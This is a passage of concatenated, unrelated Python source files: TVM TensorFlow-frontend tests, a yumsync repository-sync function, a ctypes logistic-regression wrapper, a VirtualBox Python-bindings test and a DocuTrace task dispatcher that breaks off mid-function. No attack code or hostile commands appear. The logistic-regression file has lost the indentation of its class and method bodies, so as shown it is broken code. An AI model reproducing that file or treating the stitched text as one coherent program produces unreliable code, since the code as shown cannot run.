                    z = math_ops.multiply(x, y * i)
                return z
        op = gen_functional_ops.StatefulPartitionedCall(
            args=[constant_op.constant(32.0), constant_op.constant(100.0)],
            Tout=[dtypes.float32],
            f=Body1,
        )
        compare_tf_with_tvm(
            [], [], "StatefulPartitionedCall:0", mode="vm", init_global_variables=True
        )
def _test_spop_variables():
    """Non-resource tf.Variable inputs flowing into a StatefulPartitionedCall."""
    with tf.Graph().as_default():
        const1 = tf.constant(10)
        const2 = tf.constant(20)
        var1 = tf.Variable(const1, dtype=tf.int32)
        var2 = tf.Variable(const2, dtype=tf.int32)
        @function.Defun(tf.int32, tf.int32)
        def Forward(x, y):
            return tf.multiply(x, y)
        z = gen_functional_ops.StatefulPartitionedCall(
            args=[var1, var2], Tout=[tf.int32], f=Forward
        )
        compare_tf_with_tvm(
            [], [], "StatefulPartitionedCall:0", init_global_variables=True, mode="vm"
        )
def _test_spop_constants():
    """Constants captured inside the Defun body as well as passed as call args."""
    with tf.Graph().as_default():
        @function.Defun(*[dtypes.int32] * 2)
        def constantsFn(x, y):
            vv = tf.constant([2, 3, 4], name="vv")
            z = tf.add(vv + x, y)
            return z
        a = tf.constant(20000, name="a")
        b = tf.constant(40000, name="b")
        spopFn = gen_functional_ops.StatefulPartitionedCall(
            args=[a, b], Tout=[tf.int32], f=constantsFn
        )
        compare_tf_with_tvm(
            [], [], "StatefulPartitionedCall:0", mode="vm", init_global_variables=True
        )
def _test_spop_stateful():
    """Negative test: TVM must reject stateful ops inside a partitioned call."""
    # This test case is to test that TVM rejects any TF stateful operations
    # (including Resource Variables) except StatefulPartitionedCall/PartitionedCall
    # (as these two operators can still be used as container graphs to execute
    # "stateless" operations internally).
    tf.reset_default_graph()
    with tf.Graph().as_default():
        @tf.function
        def FunctionWithStatefulOp_One(i):
            b = tf.random.uniform(shape=[2, 4], maxval=10, dtype=tf.float32, seed=10)
            y = tf.multiply(b, i)
            return y
        @tf.function
        def FunctionWithStatefulOp(m, n):
            a = tf.random.uniform(shape=[2, 4], maxval=10, dtype=tf.float32, seed=10)
            x = tf.multiply(a, m)
            y = FunctionWithStatefulOp_One(n)
            z = tf.multiply(x, y)
            return z
        op = FunctionWithStatefulOp(constant_op.constant(1.0), constant_op.constant(2.0))
        with pytest.raises(Exception) as execinfo:
            compare_tf_with_tvm([], [], [op.name], init_global_variables=True, mode="vm")
        assert execinfo.value.args[0].startswith("The following operators are not implemented")
def _test_spop_device_assignment():
    """Negative test: inconsistent device placement inside the call must be rejected."""
    # This test case is to test that TVM rejects inconsistent device assignment
    # while using StatefulPartitionedCall/PartitionedCall operators which in case of TVM will
    # be used as container graphs to internally execute "stateless" operations.
    tf.reset_default_graph()
    with tf.Graph().as_default():
        def fun1(a):
            with ops.device("/GPU:0"):
                return tf.multiply(a, a)
        def fun2(b):
            with ops.device("/job:localhost/replica:0/task:0/device:CPU:1"):
                return tf.multiply(b, b)
        @function.Defun(dtypes.float32, dtypes.float32, func_name="Fun3")
        def fun3(x, y):
            with ops.device("/CPU:0"):
                x = fun2(x)
            with ops.device("/job:localhost/replica:0/task:0/device:CPU:2"):
                y = fun1(y)
            with ops.device("/job:localhost/replica:0/task:0/device:CPU:3"):
                z = tf.add(x, y)
                return z
        op = gen_functional_ops.StatefulPartitionedCall(
            args=[tf.constant(10.5), tf.constant(20.4)], Tout=[dtypes.float32], f=fun3
        )
        with pytest.raises(Exception) as execinfo:
            compare_tf_with_tvm(
                [], [], "StatefulPartitionedCall:0", mode="vm", init_global_variables=True
            )
        assert execinfo.value.args[0].startswith("Found inconsistent Device assignment")
def _test_spop_resource_variables():
    """Negative test: resource variables in an unfrozen graph must be rejected."""
    # This test case is to test that TVM rejects any graph containing
    # resource variables with StatefulPartitionedOp.
    tf.reset_default_graph()
    with tf.Graph().as_default():
        const1 = tf.constant(10)
        const2 = tf.constant(20)
        var1 = tf.Variable(const1, dtype=tf.int32, use_resource=True)
        var2 = tf.Variable(const2, dtype=tf.int32, use_resource=True)
        @tf.function
        def resourceVariablesTest(x, y):
            return tf.multiply(x, y)
        op = resourceVariablesTest(var1, var2)
        with pytest.raises(Exception) as execinfo:
            compare_tf_with_tvm(
                [], [], "StatefulPartitionedCall:0", mode="vm", init_global_variables=True
            )
        assert execinfo.value.args[0].startswith("Graph is not frozen." " Provide a frozen graph")
def test_forward_spop():
    """Drive every StatefulPartitionedCall sub-test, preserving the original order."""
    subtests = [
        _test_spop_stateful,
        _test_spop_device_assignment,
        _test_spop_resource_variables,
        # Placeholder test cases
        _test_spop_placeholder_without_shape_info,
        _test_spop_placeholder_with_shape_and_default_value,
        _test_spop_placeholder_numpy_arange_feed,
        _test_spop_placeholder_numpy_array_feed,
        # Function Invocation test cases
        _test_spop_function_invocation_basic,
        _test_spop_function_invocation_nested,
        _test_spop_function_invocation_no_autograph,
        _test_spop_function_invocation_defun,
        # Test cases for various other TF constructs
        _test_spop_arithmetic,
        _test_spop_control_flow,
        _test_spop_variables,
        _test_spop_constants,
    ]
    for subtest in subtests:
        subtest()
#######################################################################
# Dynamic input shape
# -------------------
def test_forward_dynamic_input_shape():
    """Add over a placeholder with an unknown leading dimension, compared via the VM."""
    tf.reset_default_graph()
    with tf.Graph().as_default():
        data = tf.placeholder(tf.float32, name="data", shape=(None,))
        out = data + 1
        np_data = np.random.uniform(size=(2,)).astype("float32")
        out_name = "add"
        with tf.Session() as sess:
            graph_def = tf_testing.AddShapesToGraphDef(sess, out_name)
            tf_output = run_tf_graph(sess, np_data, "data:0", ["{}:0".format(out_name)])
            # TODO(kevinthesun): enable gpu test when VM heterogeneous execution is ready.
            for device in ["llvm"]:
                dev = tvm.device(device, 0)
                if not tvm.testing.device_enabled(device):
                    print("Skip because %s is not enabled" % device)
                    continue
                tvm_output = run_tvm_graph(
                    graph_def,
                    np_data,
                    ["data"],
                    1,
                    target=device,
                    layout="NCHW",
                    out_names=[out_name],
                    mode="vm",
                    ignore_in_shape=True,
                )
                tvm.testing.assert_allclose(tvm_output[0], tf_output[0], rtol=1e-5, atol=1e-5)
def test_forward_dynmaic_rnn_lstmblockcell():
    """Stacked LSTMBlockCell dynamic_rnn: compare one TF session step against TVM.

    Skipped on TF >= 2.0 (relies on tf.contrib, which was removed there).
    """
    if package_version.parse(tf.VERSION) >= package_version.parse("2.0.0"):
        return
    total_series_length = 50000
    truncated_backprop_length = 15
    state_size = 4
    echo_step = 3
    batch_size = 5
    num_layers = 5
    def generateData():
        """Random binary series with its echo (shifted copy) reshaped into batches."""
        x = np.array(np.random.choice(2, total_series_length, p=[0.5, 0.5]))
        y = np.roll(x, echo_step)
        y[0:echo_step] = 0
        x = x.reshape((batch_size, -1))  # The first index changing slowest, subseries as rows
        y = y.reshape((batch_size, -1))
        return (x, y)
    batchX_placeholder = tf.placeholder(tf.float32, [batch_size, truncated_backprop_length])
    init_state = tf.placeholder(tf.float32, [num_layers, 2, batch_size, state_size])
    state_per_layer_list = tf.unstack(init_state, axis=0)
    rnn_tuple_state = tuple(
        [
            tf.nn.rnn_cell.LSTMStateTuple(
                state_per_layer_list[idx][0], state_per_layer_list[idx][1]
            )
            for idx in range(num_layers)
        ]
    )
    # Forward passes
    def lstm_cell():
        return tensorflow.contrib.rnn.LSTMBlockCell(state_size)
    cell = tf.nn.rnn_cell.MultiRNNCell(
        [lstm_cell() for _ in range(num_layers)], state_is_tuple=True
    )
    states_series, current_state = tf.nn.dynamic_rnn(
        cell, tf.expand_dims(batchX_placeholder, -1), initial_state=rnn_tuple_state
    )
    with tf.Session() as sess:
        sess.run(tf.global_variables_initializer())
        x, y = generateData()
        _current_state = np.zeros((num_layers, 2, batch_size, state_size))
        start_idx = 0
        end_idx = start_idx + truncated_backprop_length
        batchX = x[:, start_idx:end_idx]
        # Save current state for TVM
        current_state_tvm = _current_state
        _current_state, _states_series = sess.run(
            [current_state, states_series],
            feed_dict={batchX_placeholder: batchX, init_state: _current_state},
        )
        # Organize results and corresponding names
        tf_output = [_states_series]
        for c in _current_state:
            tf_output.append(c.c)
            tf_output.append(c.h)
        name = [states_series.name.split(":")[0]]
        for t in current_state:
            name.append(t.c.name.split(":")[0])
            name.append(t.h.name.split(":")[0])
        graph_def = sess.graph.as_graph_def(add_shapes=True)
        final_graph_def = graph_util.convert_variables_to_constants(sess, graph_def, name)
        tvm_output = run_tvm_graph(
            final_graph_def,
            [batchX.astype("float32"), current_state_tvm.astype("float32")],
            ["Placeholder", "Placeholder_1"],
            out_names=name,
            num_output=len(name),
            mode="vm",
            disabled_pass=["FoldScaleAxis"],
        )
        # Compare result
        for i in range(len(tf_output)):
            tvm.testing.assert_allclose(tf_output[i], tvm_output[i], atol=1e-5, rtol=1e-5)
#######################################################################
# Unique
# ------------
def _test_unique(n, dtype, is_dyn):
    """Compare tf.unique outputs; dynamic mode feeds via a placeholder and the VM executor."""
    tf.reset_default_graph()
    np_data = np.random.randint(100, size=n).astype(dtype)
    with tf.Graph().as_default():
        if is_dyn:
            in_data = tf.placeholder(dtype, [n], name="in_data")
        else:
            in_data = tf.constant(np_data, dtype, name="in_data")
        tf.unique(in_data)
        if is_dyn:
            compare_tf_with_tvm(np_data, "in_data:0", ["Unique:0", "Unique:1"], mode="vm")
        else:
            compare_tf_with_tvm(None, "", ["Unique:0", "Unique:1"])
def test_forward_unique():
    """test Unique"""
    # Same iteration order as before: dtype outer, dyn/static inner, both sizes.
    for dtype in ("int32", "int64"):
        for is_dyn in (False, True):
            for size in (50, 100):
                _test_unique(size, dtype, is_dyn)
#######################################################################
# Unique with counts
# ------------
def _test_unique_with_counts(n, dtype, is_dyn):
    """Compare tf.unique_with_counts (values, indices, counts) between TF and TVM."""
    tf.reset_default_graph()
    np_data = np.random.randint(100, size=n).astype(dtype)
    with tf.Graph().as_default():
        if is_dyn:
            in_data = tf.placeholder(dtype, [n], name="in_data")
        else:
            in_data = tf.constant(np_data, dtype, name="in_data")
        tf.unique_with_counts(in_data)
        if is_dyn:
            compare_tf_with_tvm(
                np_data,
                "in_data:0",
                ["UniqueWithCounts:0", "UniqueWithCounts:1", "UniqueWithCounts:2"],
                mode="vm",
            )
        else:
            compare_tf_with_tvm(
                None, "", ["UniqueWithCounts:0", "UniqueWithCounts:1", "UniqueWithCounts:2"]
            )
def test_forward_unique_with_counts():
    """test UniqueWithCounts"""
    # Same iteration order as before: dtype outer, dyn/static inner, both sizes.
    for dtype in ("int32", "int64"):
        for is_dyn in (False, True):
            for size in (10, 20):
                _test_unique_with_counts(size, dtype, is_dyn)
if __name__ == "__main__":
    # Run every test in this module when executed as a script.
    pytest.main([__file__])
|
__init__.py | import os
import sys
import multiprocessing
import signal
import urlparse
from yumsync import util, progress
from yumsync.log import log
from yumsync.metadata import __version__
def sync(repos=None, callback=None):
    """ Mirror repositories with configuration data from multiple sources.
    Handles all input validation and higher-level logic before passing control
    on to threads for doing the actual syncing. One thread is created per
    repository to alleviate the impact of slow mirrors on faster ones.
    Returns a tuple of (repo count, error count, elapsed time).
    """
    if repos is None:
        repos = []
    prog = progress.Progress() # callbacks talk to this object
    manager = multiprocessing.Manager()
    queue = manager.Queue()
    processes = []
    def signal_handler(_signum, _frame):
        """ Inner method for terminating threads on signal events.
        This method uses os.kill() to send a SIGKILL directly to the process ID
        because the child processes are running blocking calls that will likely
        take a long time to complete.
        """
        log('Caught exit signal - aborting')
        while len(processes) > 0:
            # Iterate over a snapshot: removing entries from the list being
            # iterated would silently skip the element following each removal.
            for proc in list(processes):
                os.kill(proc.pid, signal.SIGKILL)
                if not proc.is_alive():
                    processes.remove(proc)
        sys.exit(1) # safe to do exit() here because we are a worker
    # Catch user-cancelled or killed signals to terminate threads.
    signal.signal(signal.SIGINT, signal_handler)
    signal.signal(signal.SIGTERM, signal_handler)
    for repo in repos:
        prog.update(repo.id) # Add the repo to the progress object
        yumcallback = progress.YumProgress(repo.id, queue, callback)
        repocallback = progress.ProgressCallback(queue, callback)
        repo.set_yum_callback(yumcallback)
        repo.set_repo_callback(repocallback)
        proc = multiprocessing.Process(target=repo.sync)
        processes.append(proc)
        proc.start()
    while len(processes) > 0:
        # If data is waiting in the queue from the workers, process it. This
        # needs to be done in the current scope so that one progress object may
        # hold all of the results. (This might be easier with Python 3's
        # nonlocal keyword).
        while not queue.empty():
            event = queue.get()
            if 'action' not in event:
                continue
            if event['action'] == 'repo_init' and 'data' in event:
                prog.update(event['repo_id'], set_total=event['data'][0])
            elif event['action'] == 'download_end' and 'data' in event:
                prog.update(event['repo_id'], pkgs_downloaded=event['data'][0])
            elif event['action'] == 'repo_metadata' and 'data' in event:
                prog.update(event['repo_id'], repo_metadata=event['data'][0])
            elif event['action'] == 'repo_error' and 'data' in event:
                prog.update(event['repo_id'], repo_error=event['data'][0])
            elif event['action'] in ('pkg_exists', 'link_local_pkg'):
                # Both mean the package is present locally; count it as done.
                prog.update(event['repo_id'], pkgs_downloaded=1)
            elif event['action'] in ('repo_complete', 'delete_pkg', 'repo_group_data'):
                pass # informational; progress is already tracked above.
        # Reap finished workers. Iterate a snapshot: list.remove() while
        # iterating the same list skips the next process, which could leave a
        # dead worker in the list and stall this loop for one extra pass.
        for proc in list(processes):
            if not proc.is_alive():
                processes.remove(proc)
    # Return tuple (#repos, #fail, elapsed time)
    return (len(repos), prog.totals['errors'], prog.elapsed())
|
model.py | from ctypes import *
import numpy as np
import os
import shutil
from threading import Thread
liblr = cdll.LoadLibrary(os.path.dirname(os.path.realpath(__file__))+'/liblr.so')
def accuracy(y, pred, size):
    """Fraction of the first *size* predictions matching their binary labels.

    A prediction > 0.5 counts as class 1, <= 0.5 as class 0; labels other than
    exactly 0.0/1.0 never count as hits (same as the original behavior). Works
    with Python lists, numpy arrays and ctypes pointers (all support slicing).
    Returns 0.0 for size == 0 instead of raising ZeroDivisionError.
    """
    if size <= 0:
        return 0.0
    hit = 0.0
    for label, prob in zip(y[:size], pred[:size]):
        if label == 1.0 and prob > 0.5:
            hit += 1.0
        elif label == 0.0 and prob <= 0.5:
            hit += 1.0
    return hit / size
class LogisticRegression(object):
def __init__(self, max_iter=200, alpha=0.01, l2_lambda=0.0, tolerance=0.001, seed=2018, use_batch=False):
self.max_iter = max_iter
self.alpha = alpha
self.l2_lambda = l2_lambda
self.tolerance = tolerance
self.seed = seed
self.use_batch = use_batch
self.fmodel = None
self.auto_clear = True
# support python list, numpy array
def fit(self, features, labels, batch_size=128, early_stopping_round=100, metric=accuracy):
# convert to numpy array
# if not isinstance(features, np.ndarray):
features = np.asarray(features, dtype=np.double)
labels = np.ascontiguousarray(np.asarray(labels, dtype=np.int32), dtype=np.int32)
# convert to ctypes's type
row, col = features.shape
int_p = cast(labels.ctypes.data, POINTER(c_int))
double_p_p = (features.ctypes.data + np.arange(features.shape[0]) * features.strides[0]).astype(np.uintp)
char_p = c_char_p(str("0"*25).encode('utf-8'))
# call the C function
DOUBLEPP = np.ctypeslib.ndpointer(dtype=np.uintp, ndim=1, flags='C')
INTP = POINTER(c_int)
METRIC = CFUNCTYPE(c_double, POINTER(c_double), POINTER(c_double), c_int)
liblr.lr_fit.argtypes = [DOUBLEPP,INTP,c_int,c_int,c_int,c_double,c_double,c_double,c_int,c_bool, c_int,c_int,c_char_p, METRIC]
liblr.lr_fit.restype = None
# enable interrupt
t = Thread(target=liblr.lr_fit, args=(double_p_p,int_p,c_int(row),c_int(col),c_int(self.max_iter),c_double(self.alpha),c_double(self.l2_lambda),c_double(self.tolerance),c_int(self.seed), c_bool(self.use_batch), c_int(batch_size), c_int(early_stopping_round),char_p,METRIC(metric)))
t.daemon = True
t.start()
while t.is_alive():
t.join(0.1)
# get the result
self.fmodel = char_p.value
def predict_prob(self, features):
assert self.fmodel is not None
# convert to numpy array
features = np.asarray(features, dtype=np.double)
# convert to ctypes's type
row, col = features.shape
double_p_p = (features.ctypes.data + np.arange(features.shape[0]) * features.strides[0]).astype(np.uintp)
ret_double_p = (c_double*row)(*([-1.0 for _ in range(row)]))
# call C function
DOUBLEPP = np.ctypeslib.ndpointer(dtype=np.uintp,ndim=1,flags='C')
liblr.lr_predict_prob.argtypes = [DOUBLEPP, c_int, c_int, c_char_p, POINTER(c_double)]
liblr.lr_predict_prob.restype = None
# enable interrupt
t = Thread(target=liblr.lr_predict_prob, args=(double_p_p, c_int(row), c_int(col), c_char_p(self.fmodel),ret_double_p))
t.daemon = True
t.start()
while t.is_alive():
t.join(0.1)
return [ret_double_p[i] for i in range(row)]
def predict(self, features):
assert self.fmodel is not None
prob = self.predict_prob(features)
return [1 if p>0.5 else 0 for p in prob]
def save(self, path):
shutil.copy(self.fmodel, path)
def load(self, path):
self.fmodel = path.encode('utf-8')
self.auto_clear = False
def __del__(self):
if self.auto_clear:
os.remove(self.fmodel) |
tdPython1.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# $Id: tdPython1.py $
"""
VirtualBox Validation Kit - Python Bindings Test #1
"""
__copyright__ = \
"""
Copyright (C) 2010-2015 Oracle Corporation
This file is part of VirtualBox Open Source Edition (OSE), as
available from http://www.virtualbox.org. This file is free software;
you can redistribute it and/or modify it under the terms of the GNU
General Public License (GPL) as published by the Free Software
Foundation, in version 2 as it comes in the "COPYING" file of the
VirtualBox OSE distribution. VirtualBox OSE is distributed in the
hope that it will be useful, but WITHOUT ANY WARRANTY of any kind.
The contents of this file may alternatively be used under the terms
of the Common Development and Distribution License Version 1.0
(CDDL) only, as it comes in the "COPYING.CDDL" file of the
VirtualBox OSE distribution, in which case the provisions of the
CDDL are applicable instead of those of the GPL.
You may elect to license modified versions of this file under the
terms and conditions of either the GPL or the CDDL or both.
"""
__version__ = "$Revision: 100880 $"
# Standard Python imports.
import os
import sys
import time
import threading
import types
# Only the main script needs to modify the path.
try: __file__
except: __file__ = sys.argv[0];
g_ksValidationKitDir = os.path.dirname(os.path.dirname(os.path.dirname(os.path.abspath(__file__))));
sys.path.append(g_ksValidationKitDir);
# Validation Kit imports.
from testdriver import reporter;
from testdriver import base;
from testdriver import vbox;
class tdPython1(vbox.TestDriver):
    """
    Python Bindings Test #1.

    Exercises the VirtualBox main-API event queue: waitForEvents must only be
    callable from the main thread, and interruptWaitEvents must wake it up.
    """
    def __init__(self):
        vbox.TestDriver.__init__(self);
        self.asRsrcs = None;
    #
    # Overridden methods.
    #
    def actionConfig(self):
        """
        Import the API.
        """
        if not self.importVBoxApi():
            return False;
        return True;
    def actionExecute(self):
        """
        Execute the testcase.
        """
        return self.testEventQueueWaiting() \
           and self.testEventQueueInterrupt();
    #
    # Test execution helpers.
    #
    def testEventQueueWaitingThreadProc(self):
        """ Thread procedure for checking that waitForEvents fails when not called by the main thread. """
        try:
            rc2 = self.oVBoxMgr.waitForEvents(0);
        except:
            return True;
        reporter.error('waitForEvents() returned "%s" when called on a worker thread, expected exception.' % (rc2,));
        return False;
    def testEventQueueWaiting(self):
        """
        Test event queue waiting.
        """
        reporter.testStart('waitForEvents');
        # Check return values and such.
        # NOTE(review): types.IntType exists only on Python 2 — presumably this
        # testcase targets the Python 2 bindings; confirm before porting.
        for cMsTimeout in (0, 1, 2, 3, 256, 1000, 0):
            iLoop = 0;
            while True:
                try:
                    rc = self.oVBoxMgr.waitForEvents(cMsTimeout);
                except:
                    reporter.errorXcpt();
                    break;
                if not isinstance(rc, types.IntType):
                    reporter.error('waitForEvents returns non-integer type');
                    break;
                if rc == 1:
                    break;
                if rc != 0:
                    reporter.error('waitForEvents returns "%s", expected 0 or 1' % (rc,));
                    break;
                iLoop += 1;
                if iLoop > 10240:
                    reporter.error('waitForEvents returns 0 (success) %u times. '
                                   'Expected 1 (timeout/interrupt) after a call or two.'
                                   % (iLoop,));
                    break;
            if reporter.testErrorCount() != 0:
                break;
        # Check that we get an exception when trying to call the method from
        # a different thread.
        reporter.log('If running a debug build, you will see an ignored assertion now. Please ignore it.')
        sVBoxAssertSaved = os.environ.get('VBOX_ASSERT', 'breakpoint');
        os.environ['VBOX_ASSERT'] = 'ignore';
        oThread = threading.Thread(target=self.testEventQueueWaitingThreadProc);
        oThread.start();
        oThread.join();
        os.environ['VBOX_ASSERT'] = sVBoxAssertSaved;
        return reporter.testDone()[1] == 0;
    def interruptWaitEventsThreadProc(self):
        """ Thread procedure that's used for waking up the main thread. """
        time.sleep(2);
        try:
            rc2 = self.oVBoxMgr.interruptWaitEvents();
        except:
            reporter.errorXcpt();
        else:
            if rc2 is True:
                return True;
            reporter.error('interruptWaitEvents returned "%s" when called from other thread, expected True' % (rc2,));
        return False;
    def testEventQueueInterrupt(self):
        """
        Test interrupting an event queue wait.
        """
        reporter.testStart('interruptWait');
        # interrupt ourselves first and check the return value.
        for i in range(0, 10):
            try:
                rc = self.oVBoxMgr.interruptWaitEvents();
            except:
                reporter.errorXcpt();
                break;
            if rc is not True:
                reporter.error('interruptWaitEvents returned "%s" expected True' % (rc,));
                break
        if reporter.testErrorCount() == 0:
            #
            # Interrupt a waitForEvents call.
            #
            # This test ASSUMES that no other events are posted to the thread's
            # event queue once we've drained it. Also ASSUMES the box is
            # relatively fast and not too busy because we're timing sensitive.
            #
            for i in range(0, 4):
                # Try quiesce the event queue.
                for _ in range(1, 100):
                    self.oVBoxMgr.waitForEvents(0);
                # Create a thread that will interrupt us in 2 seconds.
                try:
                    oThread = threading.Thread(target=self.interruptWaitEventsThreadProc);
                    oThread.setDaemon(False);
                except:
                    reporter.errorXcpt();
                    break;
                cMsTimeout = 20000;
                if i == 2:
                    cMsTimeout = -1;
                elif i == 3:
                    cMsTimeout = -999999;
                # Do the wait.
                oThread.start();
                msNow = base.timestampMilli();
                try:
                    rc = self.oVBoxMgr.waitForEvents(cMsTimeout);
                except:
                    reporter.errorXcpt();
                else:
                    msElapsed = base.timestampMilli() - msNow;
                    # Check the return code and elapsed time.
                    if not isinstance(rc, types.IntType):
                        reporter.error('waitForEvents returns non-integer type after %u ms, expected 1' % (msElapsed,));
                    elif rc != 1:
                        reporter.error('waitForEvents returned "%s" after %u ms, expected 1' % (rc, msElapsed));
                    if msElapsed > 15000:
                        reporter.error('waitForEvents after %u ms, expected just above 2-3 seconds' % (msElapsed,));
                    elif msElapsed < 100:
                        reporter.error('waitForEvents after %u ms, expected more than 100 ms.' % (msElapsed,));
                oThread.join();
                oThread = None;
                if reporter.testErrorCount() != 0:
                    break;
                reporter.log('Iteration %u was successful...' % (i + 1,));
        return reporter.testDone()[1] == 0;
if __name__ == '__main__':
    # Standard testdriver entry point: exit code comes from TestDriver.main().
    sys.exit(tdPython1().main(sys.argv));
|
Tasks.py | import sys
from threading import Thread
from collections import OrderedDict
from argparse import ArgumentTypeError
from time import sleep
from threading import Thread, Event
from alive_progress import alive_bar
from DocuTrace.Analysis.DataCollector import DataCollector
from DocuTrace.Analysis.ComputeData import ComputeData, top_n_sorted
from DocuTrace.Utils.Logging import debug, logger
from DocuTrace.Utils.Validation import validate_user_uuid, str2bool, validate_task, validate_doc_uuid
from DocuTrace.Utils.Exceptions import InvalidTaskIDError
from DocuTrace.Gui import main as gui
"""Provides functions to begin each task
"""
def task_1(data_collector: DataCollector, args):
    """Task 1: nothing to compute - log the implementation-language statement."""
    message = 'Task 1: The core functionality of this application is written in python.'
    logger.info(message)
def task_2a(data_collector: DataCollector, args):
    """Task 2a: histogram of the viewers' countries for a given document UUID.

    Builds the per-document country-counts figure and opens the GUI on the
    'Task 2a' tab. Any failure is logged rather than propagated.
    """
    logger.info(
        'Task 2a. Specifiy a document UUID, and return a histogram of countries of the viewers.')
    #! Render histogram inside gui
    #! Supply n_countries modification logic
    try:
        doc_uuid = get_doc_uuid(args)
        n = get_n(args)
        compute = ComputeData(data_collector)
        compute.construct_document_counts_figure(doc_uuid, show_continents=False, n_countries=n)
        gui.open(compute, doc_uuid=doc_uuid, n=n, start_tab='Task 2a')
    except Exception as e:
        logger.exception('Exception encountered during Task 2a')
def task_2b(data_collector: DataCollector, args):
    """Task 2b: histogram of the viewers' continents for a given document UUID.

    Groups viewer countries by continent, builds the figure and opens the GUI
    on the 'Task 2b' tab. Any failure is logged rather than propagated.
    """
    logger.info(
        'Task 2b. Group the countries by continent, and generate a histogram of the continents of the viewers.')
    #! Render histogram inside gui
    try:
        doc_uuid = get_doc_uuid(args)
        n = get_n(args)
        compute = ComputeData(data_collector)
        compute.construct_document_counts_figure(
            doc_uuid, show_countries=False, n_countries=n)
        gui.open(compute, doc_uuid=doc_uuid, n=n, start_tab='Task 2b')
    except Exception as e:
        # Bug fix: previously logged 'Task 2a', which mislabelled failures of
        # task 2b as failures of task 2a.
        logger.exception('Exception encountered during Task 2b')
def task_3a(data_collector: DataCollector, args):
    """Task 3a: histogram of views by browser using the raw (verbose) UA strings."""
    logger.info('Task 3a: Histogram of verbose views by browser.')
    try:
        n = get_n(args)
        compute = ComputeData(data_collector)
        compute.construct_counts_figure(show_continents=False, show_countries=False, n_browsers=n, clean_browser_names=False)
        gui.open(compute, n=n, start_tab='Task 3a')
    except Exception as e:
        logger.exception('Exception encountered during Task 3a')
def task_3b(data_collector: DataCollector, args):
    """Task 3b: histogram of views by browser with cleaned browser names."""
    logger.info(
        'Task 3b: Histogram of views by browser, with processed browser names.')
    #! Render histogram inside gui
    #! Supply n_browsers modification logic
    try:
        n = get_n(args)
        compute = ComputeData(data_collector)
        compute.construct_counts_figure(show_continents=False, show_countries=False, n_browsers=n, clean_browser_names=True)
        gui.open(compute, n=n, start_tab='Task 3b')
    except Exception as e:
        logger.exception('Exception encountered during Task 3b')
def task_4(data_collector: DataCollector, args):
    """Task 4: show the most avid readers in the GUI ('Task 4' tab)."""
    # NOTE(review): the log label 'Task 4d' looks like a typo for 'Task 4'.
    logger.info('Task 4d: 10 most avid readers.')
    try:
        n = get_n(args)
        compute = ComputeData(data_collector)
        compute.sort(sort_countries=False,
                     sort_continents=False, sort_browsers=False)
        gui.open(compute, n=n, start_tab='Task 4')
        # for i, profile in enumerate(compute.reader_profiles.values()):
        #     if i < 10:
        #         print('{:{width}} | {}'.format(i, profile, width=4))
    except Exception as e:
        logger.exception('Exception encountered during Task 4')
def task_5d(data_collector: DataCollector, args):
    """Task 5d: top-n 'also likes' documents for a document/user pair."""
    logger.info('Task 5d: Also likes top n documents.')
    #! Dont forget to catch key errors
    try:
        doc_uuid = get_doc_uuid(args)
        user_uuid = get_user_uuid(args)
        n = get_n(args)
        compute = ComputeData(data_collector)
        also_likes = compute.also_likes(doc_uuid, user_uuid, sort_fn=top_n_sorted, n=n)
        gui.open(compute, doc_uuid, user_uuid, n, start_tab='Task 5d')
        # for i, doc in enumerate(also_likes):
        #     print(i+1, ' | ', doc)
    except Exception as e:
        logger.exception('Exception encountered during Task 5d')
def task_6(data_collector: DataCollector, args):
    """Task 6: 'also likes' graph rendered inside the GUI ('Task 6' tab)."""
    logger.info('Task 6: Also likes graph, inside GUI.')
    #! Dont forget to catch key errors
    try:
        doc_uuid = get_doc_uuid(args)
        user_uuid = get_user_uuid(args)
        n = get_n(args)
        compute = ComputeData(data_collector)
        also_likes = compute.also_likes(doc_uuid, user_uuid, sort_fn=top_n_sorted, n=n)
        gui.open(compute, doc_uuid, user_uuid, n, start_tab='Task 6')
        # for i, doc in enumerate(also_likes):
        #     print(i+1, ' | ', doc)
    except Exception as e:
        logger.exception('Exception encountered during Task 6')
def task_7(data_collector: DataCollector, args):
    """Task 7: open the GUI after computing the 'also likes' documents."""
    logger.info('Task 7: Open the GUI')
    try:
        doc_uuid = get_doc_uuid(args)
        user_uuid = get_user_uuid(args)
        n = get_n(args)
        compute = ComputeData(data_collector)
        also_likes = compute.also_likes(
            doc_uuid, user_uuid, sort_fn=top_n_sorted, n=n)
        # NOTE(review): start_tab is 'Task 6' here - looks like a copy-paste
        # leftover from task_6; confirm whether the GUI has a 'Task 7' tab.
        gui.open(compute, doc_uuid, user_uuid, n, start_tab='Task 6')
        # for i, doc in enumerate(also_likes):
        #     print(i+1, ' | ', doc)
    except Exception as e:
        logger.exception('Exception encountered during Task 7')
def task_8(data_collector: DataCollector, args):
    """Task 8: the interactive command line itself - nothing extra to run."""
    logger.info('Task 8: Command line, This is it!')
# Dispatch table mapping a CLI task ID to its handler. Insertion order
# defines the "next task" sequence used by next_item().
task_picker = OrderedDict()
task_picker['1'] = task_1
task_picker['2a'] = task_2a
task_picker['2b'] = task_2b
task_picker['3a'] = task_3a
task_picker['3b'] = task_3b
task_picker['4'] = task_4
task_picker['5d'] = task_5d
task_picker['6'] = task_6
task_picker['7'] = task_7
task_picker['8'] = task_8
def next_item(key, task_dict=task_picker) -> str:
    """Get the item after the key given to the function

    Args:
        key (str): A valid key from task_dict

    Returns:
        str: The next key, or if the final key is given return the first key.
    """
    keys = list(task_dict)
    try:
        return keys[keys.index(key) + 1]
    except IndexError:
        # Wrap around to the mapping's first key. This was previously the
        # hard-coded '1', which was only correct for the default task_picker
        # and contradicted the docstring for any other task_dict.
        return keys[0]
def raise_invalid_task(*args, **kwargs):
    """Function that raises error, used when accessing the task_picker dict

    Accepts (and ignores) any arguments so it can stand in for any task
    handler returned by task_picker.get(..., raise_invalid_task).

    Raises:
        InvalidTaskIDError: Raised when the task is invalid
    """
    raise InvalidTaskIDError
def tasks(data_collector: DataCollector, thread: Thread, task_id: str, args) -> None:
    """Display a loading bar for the data processing, once processing is complete start the task based on the ArgParse parameters.

    Args:
        data_collector (DataCollector): Instance of the DataCollector class used to process the file.
        thread (Thread): The thread currently processing the file
        task_id (str): The validated identifier of the task to begin running
        args (Namespace): The CLI arguments
    """
    finished = False
    loading_event = Event()
    # Spin a progress bar on a daemon thread until the parsing thread ends.
    loading_bar = Thread(target=loading_data, args=(loading_event,), daemon=True)
    loading_bar.start()
    thread.join()
    loading_event.set()
    loading_bar.join()
    if args.exit_early:
        # Run exactly one task, then return.
